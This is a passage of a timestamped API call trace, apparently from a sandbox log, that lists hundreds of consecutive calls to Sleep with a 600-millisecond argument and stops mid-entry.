[0155.105] Sleep (dwMilliseconds=0x258) [0155.123] Sleep (dwMilliseconds=0x258) [0155.170] Sleep (dwMilliseconds=0x258) [0155.216] Sleep (dwMilliseconds=0x258) [0155.263] Sleep (dwMilliseconds=0x258) [0155.308] Sleep (dwMilliseconds=0x258) [0155.357] Sleep (dwMilliseconds=0x258) [0155.405] Sleep (dwMilliseconds=0x258) [0155.449] Sleep (dwMilliseconds=0x258) [0155.487] Sleep (dwMilliseconds=0x258) [0155.496] Sleep (dwMilliseconds=0x258) [0155.543] Sleep (dwMilliseconds=0x258) [0155.567] Sleep (dwMilliseconds=0x258) [0155.573] Sleep (dwMilliseconds=0x258) [0155.589] Sleep (dwMilliseconds=0x258) [0155.638] Sleep (dwMilliseconds=0x258) [0155.655] Sleep (dwMilliseconds=0x258) [0155.667] Sleep (dwMilliseconds=0x258) [0155.699] Sleep (dwMilliseconds=0x258) [0155.738] Sleep (dwMilliseconds=0x258) [0155.745] Sleep (dwMilliseconds=0x258) [0155.794] Sleep (dwMilliseconds=0x258) [0155.833] Sleep (dwMilliseconds=0x258) [0155.839] Sleep (dwMilliseconds=0x258) [0155.889] Sleep (dwMilliseconds=0x258) [0155.967] Sleep (dwMilliseconds=0x258) [0155.985] Sleep (dwMilliseconds=0x258) [0155.998] Sleep (dwMilliseconds=0x258) [0156.030] Sleep (dwMilliseconds=0x258) [0156.077] Sleep (dwMilliseconds=0x258) [0156.114] Sleep (dwMilliseconds=0x258) [0156.120] Sleep (dwMilliseconds=0x258) [0156.139] Sleep (dwMilliseconds=0x258) [0156.183] Sleep (dwMilliseconds=0x258) [0156.228] Sleep (dwMilliseconds=0x258) [0156.280] Sleep (dwMilliseconds=0x258) [0156.327] Sleep (dwMilliseconds=0x258) [0156.343] Sleep (dwMilliseconds=0x258) [0156.354] Sleep (dwMilliseconds=0x258) [0156.389] Sleep (dwMilliseconds=0x258) [0156.437] Sleep (dwMilliseconds=0x258) [0156.478] Sleep (dwMilliseconds=0x258) [0156.506] Sleep (dwMilliseconds=0x258) [0156.561] Sleep (dwMilliseconds=0x258) [0156.611] Sleep (dwMilliseconds=0x258) [0156.655] Sleep (dwMilliseconds=0x258) [0156.698] Sleep (dwMilliseconds=0x258) [0156.808] Sleep (dwMilliseconds=0x258) [0156.854] Sleep (dwMilliseconds=0x258) [0156.904] Sleep (dwMilliseconds=0x258) [0157.062] Sleep (dwMilliseconds=0x258) [0157.105] Sleep (dwMilliseconds=0x258) [0157.166] Sleep (dwMilliseconds=0x258) [0157.250] Sleep (dwMilliseconds=0x258) [0157.270] Sleep (dwMilliseconds=0x258) [0157.279] Sleep (dwMilliseconds=0x258) [0157.311] Sleep (dwMilliseconds=0x258) [0157.357] Sleep (dwMilliseconds=0x258) [0157.420] Sleep (dwMilliseconds=0x258) [0157.457] Sleep (dwMilliseconds=0x258) [0157.466] Sleep (dwMilliseconds=0x258) [0157.482] Sleep (dwMilliseconds=0x258) [0157.532] Sleep (dwMilliseconds=0x258) [0157.560] Sleep (dwMilliseconds=0x258) [0157.575] Sleep (dwMilliseconds=0x258) [0157.639] Sleep (dwMilliseconds=0x258) [0157.674] Sleep (dwMilliseconds=0x258) [0157.687] Sleep (dwMilliseconds=0x258) [0157.700] Sleep (dwMilliseconds=0x258) [0157.750] Sleep (dwMilliseconds=0x258) [0157.782] Sleep (dwMilliseconds=0x258) [0157.794] Sleep (dwMilliseconds=0x258) [0157.811] Sleep (dwMilliseconds=0x258) [0157.860] Sleep (dwMilliseconds=0x258) [0157.904] Sleep (dwMilliseconds=0x258) [0157.993] Sleep (dwMilliseconds=0x258) [0158.038] Sleep (dwMilliseconds=0x258) [0158.042] Sleep (dwMilliseconds=0x258) [0158.092] Sleep (dwMilliseconds=0x258) [0158.186] Sleep (dwMilliseconds=0x258) [0158.248] Sleep (dwMilliseconds=0x258) [0158.289] Sleep (dwMilliseconds=0x258) [0158.292] Sleep (dwMilliseconds=0x258) [0158.341] Sleep (dwMilliseconds=0x258) [0158.382] Sleep (dwMilliseconds=0x258) [0158.386] Sleep (dwMilliseconds=0x258) [0158.435] Sleep (dwMilliseconds=0x258) [0158.467] Sleep (dwMilliseconds=0x258) [0158.486] Sleep (dwMilliseconds=0x258) [0158.529] Sleep (dwMilliseconds=0x258) [0158.575] Sleep (dwMilliseconds=0x258) [0158.619] Sleep (dwMilliseconds=0x258) [0158.671] Sleep (dwMilliseconds=0x258) [0158.716] Sleep (dwMilliseconds=0x258) [0158.779] Sleep (dwMilliseconds=0x258) [0158.814] Sleep (dwMilliseconds=0x258) [0158.855] Sleep (dwMilliseconds=0x258) [0158.920] Sleep (dwMilliseconds=0x258) [0159.017] Sleep (dwMilliseconds=0x258) [0159.139] Sleep (dwMilliseconds=0x258) [0159.217] Sleep (dwMilliseconds=0x258) [0159.889] Sleep (dwMilliseconds=0x258) [0160.003] Sleep (dwMilliseconds=0x258) [0160.173] Sleep (dwMilliseconds=0x258) [0160.293] Sleep (dwMilliseconds=0x258) [0160.505] Sleep (dwMilliseconds=0x258) [0160.917] Sleep (dwMilliseconds=0x258) [0161.380] Sleep (dwMilliseconds=0x258) [0162.218] Sleep (dwMilliseconds=0x258) [0163.812] Sleep (dwMilliseconds=0x258) [0164.225] Sleep (dwMilliseconds=0x258) [0164.272] Sleep (dwMilliseconds=0x258) [0164.314] Sleep (dwMilliseconds=0x258) [0164.350] Sleep (dwMilliseconds=0x258) [0164.374] Sleep (dwMilliseconds=0x258) [0164.426] Sleep (dwMilliseconds=0x258) [0164.453] Sleep (dwMilliseconds=0x258) [0164.464] Sleep (dwMilliseconds=0x258) [0164.482] Sleep (dwMilliseconds=0x258) [0164.989] Sleep (dwMilliseconds=0x258) [0165.155] Sleep (dwMilliseconds=0x258) [0165.204] Sleep (dwMilliseconds=0x258) [0165.769] Sleep (dwMilliseconds=0x258) [0165.855] Sleep (dwMilliseconds=0x258) [0166.323] Sleep (dwMilliseconds=0x258) [0166.554] Sleep (dwMilliseconds=0x258) [0166.857] Sleep (dwMilliseconds=0x258) [0167.261] Sleep (dwMilliseconds=0x258) [0167.357] Sleep (dwMilliseconds=0x258) [0167.764] Sleep (dwMilliseconds=0x258) [0168.393] Sleep (dwMilliseconds=0x258) [0168.504] Sleep (dwMilliseconds=0x258) [0169.093] Sleep (dwMilliseconds=0x258) [0169.956] Sleep (dwMilliseconds=0x258) [0170.170] Sleep (dwMilliseconds=0x258) [0170.248] Sleep (dwMilliseconds=0x258) [0170.331] Sleep (dwMilliseconds=0x258) [0170.415] Sleep (dwMilliseconds=0x258) [0170.478] Sleep (dwMilliseconds=0x258) [0170.545] Sleep (dwMilliseconds=0x258) [0170.625] Sleep (dwMilliseconds=0x258) [0170.935] Sleep (dwMilliseconds=0x258) [0171.062] Sleep (dwMilliseconds=0x258) [0171.152] Sleep (dwMilliseconds=0x258) [0171.357] Sleep (dwMilliseconds=0x258) [0171.482] Sleep (dwMilliseconds=0x258) [0171.545] Sleep (dwMilliseconds=0x258) [0171.568] Sleep (dwMilliseconds=0x258) [0171.608] Sleep (dwMilliseconds=0x258) [0171.659] Sleep (dwMilliseconds=0x258) [0171.729] Sleep (dwMilliseconds=0x258) [0171.781] Sleep (dwMilliseconds=0x258) [0171.828] Sleep (dwMilliseconds=0x258) [0171.885] Sleep (dwMilliseconds=0x258) [0171.948] Sleep (dwMilliseconds=0x258) [0172.000] Sleep (dwMilliseconds=0x258) [0172.088] Sleep (dwMilliseconds=0x258) [0172.158] Sleep (dwMilliseconds=0x258) [0172.248] Sleep (dwMilliseconds=0x258) [0172.332] Sleep (dwMilliseconds=0x258) [0172.408] Sleep (dwMilliseconds=0x258) [0172.517] Sleep (dwMilliseconds=0x258) [0172.622] Sleep (dwMilliseconds=0x258) [0172.673] Sleep (dwMilliseconds=0x258) [0172.713] Sleep (dwMilliseconds=0x258) [0172.733] Sleep (dwMilliseconds=0x258) [0172.777] Sleep (dwMilliseconds=0x258) [0172.808] Sleep (dwMilliseconds=0x258) [0172.823] Sleep (dwMilliseconds=0x258) [0172.871] Sleep (dwMilliseconds=0x258) [0172.895] Sleep (dwMilliseconds=0x258) [0172.901] Sleep (dwMilliseconds=0x258) [0172.932] Sleep (dwMilliseconds=0x258) [0172.981] Sleep (dwMilliseconds=0x258) [0173.014] Sleep (dwMilliseconds=0x258) [0173.031] Sleep (dwMilliseconds=0x258) [0173.042] Sleep (dwMilliseconds=0x258) [0173.093] Sleep (dwMilliseconds=0x258) [0173.132] Sleep (dwMilliseconds=0x258) [0173.138] Sleep (dwMilliseconds=0x258) [0173.151] Sleep (dwMilliseconds=0x258) [0173.217] Sleep (dwMilliseconds=0x258) [0173.275] Sleep (dwMilliseconds=0x258) [0173.334] Sleep (dwMilliseconds=0x258) [0173.377] Sleep (dwMilliseconds=0x258) [0173.388] Sleep (dwMilliseconds=0x258) [0173.448] Sleep (dwMilliseconds=0x258) [0173.493] Sleep (dwMilliseconds=0x258) [0173.496] Sleep (dwMilliseconds=0x258) [0173.514] Sleep (dwMilliseconds=0x258) [0173.613] Sleep (dwMilliseconds=0x258) [0173.666] Sleep (dwMilliseconds=0x258) [0173.736] Sleep (dwMilliseconds=0x258) [0173.794] Sleep (dwMilliseconds=0x258) [0173.811] Sleep (dwMilliseconds=0x258) [0173.859] Sleep (dwMilliseconds=0x258) [0173.939] Sleep (dwMilliseconds=0x258) [0173.996] Sleep (dwMilliseconds=0x258) [0174.060] Sleep (dwMilliseconds=0x258) [0174.140] Sleep (dwMilliseconds=0x258) [0174.200] Sleep (dwMilliseconds=0x258) [0174.286] Sleep (dwMilliseconds=0x258) [0174.341] Sleep (dwMilliseconds=0x258) [0174.390] Sleep (dwMilliseconds=0x258) [0174.435] Sleep (dwMilliseconds=0x258) [0174.536] Sleep (dwMilliseconds=0x258) [0174.652] Sleep (dwMilliseconds=0x258) [0174.748] Sleep (dwMilliseconds=0x258) [0175.301] Sleep (dwMilliseconds=0x258) [0175.417] Sleep (dwMilliseconds=0x258) [0175.544] Sleep (dwMilliseconds=0x258) [0175.711] Sleep (dwMilliseconds=0x258) [0175.791] Sleep (dwMilliseconds=0x258) [0175.997] Sleep (dwMilliseconds=0x258) [0176.060] Sleep (dwMilliseconds=0x258) [0176.143] Sleep (dwMilliseconds=0x258) [0176.247] Sleep (dwMilliseconds=0x258) [0176.486] Sleep (dwMilliseconds=0x258) [0176.574] Sleep (dwMilliseconds=0x258) [0176.665] Sleep (dwMilliseconds=0x258) [0176.758] Sleep (dwMilliseconds=0x258) [0177.128] Sleep (dwMilliseconds=0x258) [0177.183] Sleep (dwMilliseconds=0x258) [0177.249] Sleep (dwMilliseconds=0x258) [0177.361] Sleep (dwMilliseconds=0x258) [0177.418] Sleep (dwMilliseconds=0x258) [0177.478] Sleep (dwMilliseconds=0x258) [0177.526] Sleep (dwMilliseconds=0x258) [0177.547] Sleep (dwMilliseconds=0x258) [0177.560] Sleep (dwMilliseconds=0x258) [0177.598] Sleep (dwMilliseconds=0x258) [0177.639] Sleep (dwMilliseconds=0x258) [0177.656] Sleep (dwMilliseconds=0x258) [0177.667] Sleep (dwMilliseconds=0x258) [0177.699] Sleep (dwMilliseconds=0x258) [0177.748] Sleep (dwMilliseconds=0x258) [0177.777] Sleep (dwMilliseconds=0x258) [0177.796] Sleep (dwMilliseconds=0x258) [0177.839] Sleep (dwMilliseconds=0x258) [0177.869] Sleep (dwMilliseconds=0x258) [0177.886] Sleep (dwMilliseconds=0x258) [0177.924] Sleep (dwMilliseconds=0x258) [0178.021] Sleep (dwMilliseconds=0x258) [0178.037] Sleep (dwMilliseconds=0x258) [0178.042] Sleep (dwMilliseconds=0x258) [0178.073] Sleep (dwMilliseconds=0x258) [0178.133] Sleep (dwMilliseconds=0x258) [0178.150] Sleep (dwMilliseconds=0x258) [0178.169] Sleep (dwMilliseconds=0x258) [0178.207] Sleep (dwMilliseconds=0x258) [0178.251] Sleep (dwMilliseconds=0x258) [0178.300] Sleep (dwMilliseconds=0x258) [0178.343] Sleep (dwMilliseconds=0x258) [0178.387] Sleep (dwMilliseconds=0x258) [0178.432] Sleep (dwMilliseconds=0x258) [0178.485] Sleep (dwMilliseconds=0x258) [0178.529] Sleep (dwMilliseconds=0x258) [0178.565] Sleep (dwMilliseconds=0x258) [0178.575] Sleep (dwMilliseconds=0x258) [0178.589] Sleep (dwMilliseconds=0x258) [0178.639] Sleep (dwMilliseconds=0x258) [0179.280] Sleep (dwMilliseconds=0x258) [0179.686] Sleep (dwMilliseconds=0x258) [0179.938] Sleep (dwMilliseconds=0x258) [0180.037] Sleep (dwMilliseconds=0x258) [0180.126] Sleep (dwMilliseconds=0x258) [0180.266] Sleep (dwMilliseconds=0x258) [0180.358] Sleep (dwMilliseconds=0x258) [0180.408] Sleep (dwMilliseconds=0x258) [0180.437] Sleep (dwMilliseconds=0x258) [0180.468] Sleep (dwMilliseconds=0x258) [0180.543] Sleep (dwMilliseconds=0x258) [0181.154] Sleep (dwMilliseconds=0x258) [0181.240] Sleep (dwMilliseconds=0x258) [0181.277] Sleep (dwMilliseconds=0x258) [0181.336] Sleep (dwMilliseconds=0x258) [0181.381] Sleep (dwMilliseconds=0x258) [0181.402] Sleep (dwMilliseconds=0x258) [0181.607] Sleep (dwMilliseconds=0x258) [0181.825] Sleep (dwMilliseconds=0x258) [0182.186] Sleep (dwMilliseconds=0x258) [0182.278] Sleep (dwMilliseconds=0x258) [0182.370] Sleep (dwMilliseconds=0x258) [0182.500] Sleep (dwMilliseconds=0x258) [0183.093] Sleep (dwMilliseconds=0x258) [0183.193] Sleep (dwMilliseconds=0x258) [0183.224] Sleep (dwMilliseconds=0x258) [0183.312] Sleep (dwMilliseconds=0x258) [0183.652] Sleep (dwMilliseconds=0x258) [0183.713] Sleep (dwMilliseconds=0x258) [0183.827] Sleep (dwMilliseconds=0x258) [0184.383] Sleep (dwMilliseconds=0x258) [0184.496] Sleep (dwMilliseconds=0x258) [0184.677] Sleep (dwMilliseconds=0x258) [0184.860] Sleep (dwMilliseconds=0x258) [0184.978] Sleep (dwMilliseconds=0x258) [0185.163] Sleep (dwMilliseconds=0x258) [0185.191] Sleep (dwMilliseconds=0x258) [0185.214] Sleep (dwMilliseconds=0x258) [0185.254] Sleep (dwMilliseconds=0x258) [0185.313] Sleep (dwMilliseconds=0x258) [0185.333] Sleep (dwMilliseconds=0x258) [0185.346] Sleep (dwMilliseconds=0x258) [0185.380] Sleep (dwMilliseconds=0x258) [0185.438] Sleep (dwMilliseconds=0x258) [0185.486] Sleep (dwMilliseconds=0x258) [0185.694] Sleep (dwMilliseconds=0x258) [0185.796] Sleep (dwMilliseconds=0x258) [0185.842] Sleep (dwMilliseconds=0x258) [0185.888] Sleep (dwMilliseconds=0x258) [0185.936] Sleep (dwMilliseconds=0x258) [0186.025] Sleep (dwMilliseconds=0x258) [0186.102] Sleep (dwMilliseconds=0x258) [0186.125] Sleep (dwMilliseconds=0x258) [0186.187] Sleep (dwMilliseconds=0x258) [0186.230] Sleep (dwMilliseconds=0x258) [0186.295] Sleep (dwMilliseconds=0x258) [0186.509] Sleep (dwMilliseconds=0x258) [0186.554] Sleep (dwMilliseconds=0x258) [0186.639] Sleep (dwMilliseconds=0x258) [0186.698] Sleep (dwMilliseconds=0x258) [0186.734] Sleep (dwMilliseconds=0x258) [0186.750] Sleep (dwMilliseconds=0x258) [0186.764] Sleep (dwMilliseconds=0x258) [0186.811] Sleep (dwMilliseconds=0x258) [0186.857] Sleep (dwMilliseconds=0x258) [0186.920] Sleep (dwMilliseconds=0x258) [0187.016] Sleep (dwMilliseconds=0x258) [0187.027] Sleep (dwMilliseconds=0x258) [0187.077] Sleep (dwMilliseconds=0x258) [0187.116] Sleep (dwMilliseconds=0x258) [0187.120] Sleep (dwMilliseconds=0x258) [0187.139] Sleep (dwMilliseconds=0x258) [0187.185] Sleep (dwMilliseconds=0x258) [0187.206] Sleep (dwMilliseconds=0x258) [0187.218] Sleep (dwMilliseconds=0x258) [0187.249] Sleep (dwMilliseconds=0x258) [0187.295] Sleep (dwMilliseconds=0x258) [0187.315] Sleep (dwMilliseconds=0x258) [0187.358] Sleep (dwMilliseconds=0x258) [0187.386] Sleep (dwMilliseconds=0x258) [0187.433] Sleep (dwMilliseconds=0x258) [0187.574] Sleep (dwMilliseconds=0x258) [0187.624] Sleep (dwMilliseconds=0x258) [0187.683] Sleep (dwMilliseconds=0x258) [0187.701] Sleep (dwMilliseconds=0x258) [0187.714] Sleep (dwMilliseconds=0x258) [0187.763] Sleep (dwMilliseconds=0x258) [0187.790] Sleep (dwMilliseconds=0x258) [0187.793] Sleep (dwMilliseconds=0x258) [0187.811] Sleep (dwMilliseconds=0x258) [0187.857] Sleep (dwMilliseconds=0x258) [0187.878] Sleep (dwMilliseconds=0x258) [0187.888] Sleep (dwMilliseconds=0x258) [0187.920] Sleep (dwMilliseconds=0x258) [0187.964] Sleep (dwMilliseconds=0x258) [0187.983] Sleep (dwMilliseconds=0x258) [0187.998] Sleep (dwMilliseconds=0x258) [0188.030] Sleep (dwMilliseconds=0x258) [0188.076] Sleep (dwMilliseconds=0x258) [0188.095] Sleep (dwMilliseconds=0x258) [0188.107] Sleep (dwMilliseconds=0x258) [0188.140] Sleep (dwMilliseconds=0x258) [0188.185] Sleep (dwMilliseconds=0x258) [0188.207] Sleep (dwMilliseconds=0x258) [0188.213] Sleep (dwMilliseconds=0x258) [0188.236] Sleep (dwMilliseconds=0x258) [0188.278] Sleep (dwMilliseconds=0x258) [0188.327] Sleep (dwMilliseconds=0x258) [0188.389] Sleep (dwMilliseconds=0x258) [0188.436] Sleep (dwMilliseconds=0x258) [0188.479] Sleep (dwMilliseconds=0x258) [0188.545] Sleep (dwMilliseconds=0x258) [0188.560] Sleep (dwMilliseconds=0x258) [0188.607] Sleep (dwMilliseconds=0x258) [0188.645] Sleep (dwMilliseconds=0x258) [0188.654] Sleep (dwMilliseconds=0x258) [0188.691] Sleep (dwMilliseconds=0x258) [0188.732] Sleep (dwMilliseconds=0x258) [0188.762] Sleep (dwMilliseconds=0x258) [0188.780] Sleep (dwMilliseconds=0x258) [0188.826] Sleep (dwMilliseconds=0x258) [0188.849] Sleep (dwMilliseconds=0x258) [0188.857] Sleep (dwMilliseconds=0x258) [0188.886] Sleep (dwMilliseconds=0x258) [0188.932] Sleep (dwMilliseconds=0x258) [0188.983] Sleep (dwMilliseconds=0x258) [0189.055] Sleep (dwMilliseconds=0x258) [0189.090] Sleep (dwMilliseconds=0x258) [0189.125] Sleep (dwMilliseconds=0x258) [0189.167] Sleep (dwMilliseconds=0x258) [0189.195] Sleep (dwMilliseconds=0x258) [0189.200] Sleep (dwMilliseconds=0x258) [0189.214] Sleep (dwMilliseconds=0x258) [0189.264] Sleep (dwMilliseconds=0x258) [0189.295] Sleep (dwMilliseconds=0x258) [0189.364] Sleep (dwMilliseconds=0x258) [0189.423] Sleep (dwMilliseconds=0x258) [0189.469] Sleep (dwMilliseconds=0x258) [0189.522] Sleep (dwMilliseconds=0x258) [0189.578] Sleep (dwMilliseconds=0x258) [0189.624] Sleep (dwMilliseconds=0x258) [0189.667] Sleep (dwMilliseconds=0x258) [0189.723] Sleep (dwMilliseconds=0x258) [0189.751] Sleep (dwMilliseconds=0x258) [0189.796] Sleep (dwMilliseconds=0x258) [0189.843] Sleep (dwMilliseconds=0x258) [0189.905] Sleep (dwMilliseconds=0x258) [0189.951] Sleep (dwMilliseconds=0x258) [0189.967] Sleep (dwMilliseconds=0x258) [0189.985] Sleep (dwMilliseconds=0x258) [0190.156] Sleep (dwMilliseconds=0x258) [0190.212] Sleep (dwMilliseconds=0x258) [0190.261] Sleep (dwMilliseconds=0x258) [0190.311] Sleep (dwMilliseconds=0x258) [0190.363] Sleep (dwMilliseconds=0x258) [0190.421] Sleep (dwMilliseconds=0x258) [0190.482] Sleep (dwMilliseconds=0x258) [0190.548] Sleep (dwMilliseconds=0x258) [0190.557] Sleep (dwMilliseconds=0x258) [0190.608] Sleep (dwMilliseconds=0x258) [0190.655] Sleep (dwMilliseconds=0x258) [0190.675] Sleep (dwMilliseconds=0x258) [0190.685] Sleep (dwMilliseconds=0x258) [0190.714] Sleep (dwMilliseconds=0x258) [0190.798] Sleep (dwMilliseconds=0x258) [0190.828] Sleep (dwMilliseconds=0x258) [0190.839] Sleep (dwMilliseconds=0x258) [0190.858] Sleep (dwMilliseconds=0x258) [0190.901] Sleep (dwMilliseconds=0x258) [0190.950] Sleep (dwMilliseconds=0x258) [0191.015] Sleep (dwMilliseconds=0x258) [0191.110] Sleep (dwMilliseconds=0x258) [0191.158] Sleep (dwMilliseconds=0x258) [0191.167] Sleep (dwMilliseconds=0x258) [0191.214] Sleep (dwMilliseconds=0x258) [0191.268] Sleep (dwMilliseconds=0x258) [0191.296] Sleep (dwMilliseconds=0x258) [0191.363] Sleep (dwMilliseconds=0x258) [0191.409] Sleep (dwMilliseconds=0x258) [0191.454] Sleep (dwMilliseconds=0x258) [0191.520] Sleep (dwMilliseconds=0x258) [0191.566] Sleep (dwMilliseconds=0x258) [0191.580] Sleep (dwMilliseconds=0x258) [0191.593] Sleep (dwMilliseconds=0x258) [0191.646] Sleep (dwMilliseconds=0x258) [0191.677] Sleep (dwMilliseconds=0x258) [0191.832] Sleep (dwMilliseconds=0x258) [0191.871] Sleep (dwMilliseconds=0x258) [0191.922] Sleep (dwMilliseconds=0x258) [0191.983] Sleep (dwMilliseconds=0x258) [0192.095] Sleep (dwMilliseconds=0x258) [0192.146] Sleep (dwMilliseconds=0x258) [0192.195] Sleep (dwMilliseconds=0x258) [0192.542] Sleep (dwMilliseconds=0x258) [0192.618] Sleep (dwMilliseconds=0x258) [0192.713] Sleep (dwMilliseconds=0x258) [0192.827] Sleep (dwMilliseconds=0x258) [0192.931] Sleep (dwMilliseconds=0x258) [0193.026] Sleep (dwMilliseconds=0x258) [0193.083] Sleep (dwMilliseconds=0x258) [0193.136] Sleep (dwMilliseconds=0x258) [0193.200] Sleep (dwMilliseconds=0x258) [0193.242] Sleep (dwMilliseconds=0x258) [0193.246] Sleep (dwMilliseconds=0x258) [0193.434] Sleep (dwMilliseconds=0x258) [0193.593] Sleep (dwMilliseconds=0x258) [0193.730] Sleep (dwMilliseconds=0x258) [0193.777] Sleep (dwMilliseconds=0x258) [0193.841] Sleep (dwMilliseconds=0x258) [0193.933] Sleep (dwMilliseconds=0x258) [0194.020] Sleep (dwMilliseconds=0x258) [0194.034] Sleep (dwMilliseconds=0x258) [0194.050] Sleep (dwMilliseconds=0x258) [0194.187] Sleep (dwMilliseconds=0x258) [0194.232] Sleep (dwMilliseconds=0x258) [0194.296] Sleep (dwMilliseconds=0x258) [0194.362] Sleep (dwMilliseconds=0x258) [0194.498] Sleep (dwMilliseconds=0x258) [0194.558] Sleep (dwMilliseconds=0x258) [0194.609] Sleep (dwMilliseconds=0x258) [0194.655] Sleep (dwMilliseconds=0x258) [0194.700] Sleep (dwMilliseconds=0x258) [0194.750] Sleep (dwMilliseconds=0x258) [0194.792] Sleep (dwMilliseconds=0x258) [0194.839] Sleep (dwMilliseconds=0x258) [0194.860] Sleep (dwMilliseconds=0x258) [0194.872] Sleep (dwMilliseconds=0x258) [0194.903] Sleep (dwMilliseconds=0x258) [0194.952] Sleep (dwMilliseconds=0x258) [0195.013] Sleep (dwMilliseconds=0x258) [0195.063] Sleep (dwMilliseconds=0x258) [0195.122] Sleep (dwMilliseconds=0x258) [0195.186] Sleep (dwMilliseconds=0x258) [0195.248] Sleep (dwMilliseconds=0x258) [0195.297] Sleep (dwMilliseconds=0x258) [0195.315] Sleep (dwMilliseconds=0x258) [0195.334] Sleep (dwMilliseconds=0x258) [0195.357] Sleep (dwMilliseconds=0x258) [0195.405] Sleep (dwMilliseconds=0x258) [0195.448] Sleep (dwMilliseconds=0x258) [0195.548] Sleep (dwMilliseconds=0x258) [0195.625] Sleep (dwMilliseconds=0x258) [0195.682] Sleep (dwMilliseconds=0x258) [0195.794] Sleep (dwMilliseconds=0x258) [0195.885] Sleep (dwMilliseconds=0x258) [0195.984] Sleep (dwMilliseconds=0x258) [0196.033] Sleep (dwMilliseconds=0x258) [0196.077] Sleep (dwMilliseconds=0x258) [0196.170] Sleep (dwMilliseconds=0x258) [0196.233] Sleep (dwMilliseconds=0x258) [0196.303] Sleep (dwMilliseconds=0x258) [0196.352] Sleep (dwMilliseconds=0x258) [0196.403] Sleep (dwMilliseconds=0x258) [0196.644] Sleep (dwMilliseconds=0x258) [0196.764] Sleep (dwMilliseconds=0x258) [0196.957] Sleep (dwMilliseconds=0x258) [0197.052] Sleep (dwMilliseconds=0x258) [0197.165] Sleep (dwMilliseconds=0x258) [0197.246] Sleep (dwMilliseconds=0x258) [0197.371] Sleep (dwMilliseconds=0x258) [0197.423] Sleep (dwMilliseconds=0x258) [0197.462] Sleep (dwMilliseconds=0x258) [0197.478] Sleep (dwMilliseconds=0x258) [0197.534] Sleep (dwMilliseconds=0x258) [0197.587] Sleep (dwMilliseconds=0x258) [0197.628] Sleep (dwMilliseconds=0x258) [0197.718] Sleep (dwMilliseconds=0x258) [0197.764] Sleep (dwMilliseconds=0x258) [0197.857] Sleep (dwMilliseconds=0x258) [0197.956] Sleep (dwMilliseconds=0x258) [0198.001] Sleep (dwMilliseconds=0x258) [0198.035] Sleep (dwMilliseconds=0x258) [0198.124] Sleep (dwMilliseconds=0x258) [0198.185] Sleep (dwMilliseconds=0x258) [0198.236] Sleep (dwMilliseconds=0x258) [0198.291] Sleep (dwMilliseconds=0x258) [0198.344] Sleep (dwMilliseconds=0x258) [0198.381] Sleep (dwMilliseconds=0x258) [0198.405] Sleep (dwMilliseconds=0x258) [0198.451] Sleep (dwMilliseconds=0x258) [0198.502] Sleep (dwMilliseconds=0x258) [0198.560] Sleep (dwMilliseconds=0x258) [0198.657] Sleep (dwMilliseconds=0x258) [0198.743] Sleep (dwMilliseconds=0x258) [0198.785] Sleep (dwMilliseconds=0x258) [0198.921] Sleep (dwMilliseconds=0x258) [0198.964] Sleep (dwMilliseconds=0x258) [0198.996] Sleep (dwMilliseconds=0x258) [0199.043] Sleep (dwMilliseconds=0x258) [0199.106] Sleep (dwMilliseconds=0x258) [0199.186] Sleep (dwMilliseconds=0x258) [0199.272] Sleep (dwMilliseconds=0x258) [0199.339] Sleep (dwMilliseconds=0x258) [0199.362] Sleep (dwMilliseconds=0x258) [0199.400] Sleep (dwMilliseconds=0x258) [0199.430] Sleep (dwMilliseconds=0x258) [0199.620] Sleep (dwMilliseconds=0x258) [0199.708] Sleep (dwMilliseconds=0x258) [0199.782] Sleep (dwMilliseconds=0x258) [0199.862] Sleep (dwMilliseconds=0x258) [0199.909] Sleep (dwMilliseconds=0x258) [0199.987] Sleep (dwMilliseconds=0x258) [0200.079] Sleep (dwMilliseconds=0x258) [0200.160] Sleep (dwMilliseconds=0x258) [0200.203] Sleep (dwMilliseconds=0x258) [0200.301] Sleep (dwMilliseconds=0x258) [0200.345] Sleep (dwMilliseconds=0x258) [0200.385] Sleep (dwMilliseconds=0x258) [0200.483] Sleep (dwMilliseconds=0x258) [0200.561] Sleep (dwMilliseconds=0x258) [0200.631] Sleep (dwMilliseconds=0x258) [0200.686] Sleep (dwMilliseconds=0x258) [0200.843] Sleep (dwMilliseconds=0x258) [0200.936] Sleep (dwMilliseconds=0x258) [0201.029] Sleep (dwMilliseconds=0x258) [0201.105] Sleep (dwMilliseconds=0x258) [0201.154] Sleep (dwMilliseconds=0x258) [0201.325] Sleep (dwMilliseconds=0x258) [0201.435] Sleep (dwMilliseconds=0x258) [0201.542] Sleep (dwMilliseconds=0x258) [0201.623] Sleep (dwMilliseconds=0x258) [0201.670] Sleep (dwMilliseconds=0x258) [0201.764] Sleep (dwMilliseconds=0x258) [0201.832] Sleep (dwMilliseconds=0x258) [0201.938] Sleep (dwMilliseconds=0x258) [0202.036] Sleep (dwMilliseconds=0x258) [0202.108] Sleep (dwMilliseconds=0x258) [0202.198] Sleep (dwMilliseconds=0x258) [0202.340] Sleep (dwMilliseconds=0x258) [0202.480] Sleep (dwMilliseconds=0x258) [0202.580] Sleep (dwMilliseconds=0x258) [0202.662] Sleep (dwMilliseconds=0x258) [0202.716] Sleep (dwMilliseconds=0x258) [0202.730] Sleep (dwMilliseconds=0x258) [0202.780] Sleep (dwMilliseconds=0x258) [0202.872] Sleep (dwMilliseconds=0x258) [0202.964] Sleep (dwMilliseconds=0x258) [0203.106] Sleep (dwMilliseconds=0x258) [0203.201] Sleep (dwMilliseconds=0x258) [0203.281] Sleep (dwMilliseconds=0x258) [0203.318] Sleep (dwMilliseconds=0x258) [0203.372] Sleep (dwMilliseconds=0x258) [0203.406] Sleep (dwMilliseconds=0x258) [0203.417] Sleep (dwMilliseconds=0x258) [0203.436] Sleep (dwMilliseconds=0x258) [0203.542] Sleep (dwMilliseconds=0x258) [0203.681] Sleep (dwMilliseconds=0x258) [0203.749] Sleep (dwMilliseconds=0x258) [0203.841] Sleep (dwMilliseconds=0x258) [0203.919] Sleep (dwMilliseconds=0x258) [0203.982] Sleep (dwMilliseconds=0x258) [0204.045] Sleep (dwMilliseconds=0x258) [0204.061] Sleep (dwMilliseconds=0x258) [0204.077] Sleep (dwMilliseconds=0x258) [0204.107] Sleep (dwMilliseconds=0x258) [0204.217] Sleep (dwMilliseconds=0x258) [0204.387] Sleep (dwMilliseconds=0x258) [0204.436] Sleep (dwMilliseconds=0x258) [0204.545] Sleep (dwMilliseconds=0x258) [0204.625] Sleep (dwMilliseconds=0x258) [0204.770] Sleep (dwMilliseconds=0x258) [0205.007] Sleep (dwMilliseconds=0x258) [0205.065] Sleep (dwMilliseconds=0x258) [0205.107] Sleep 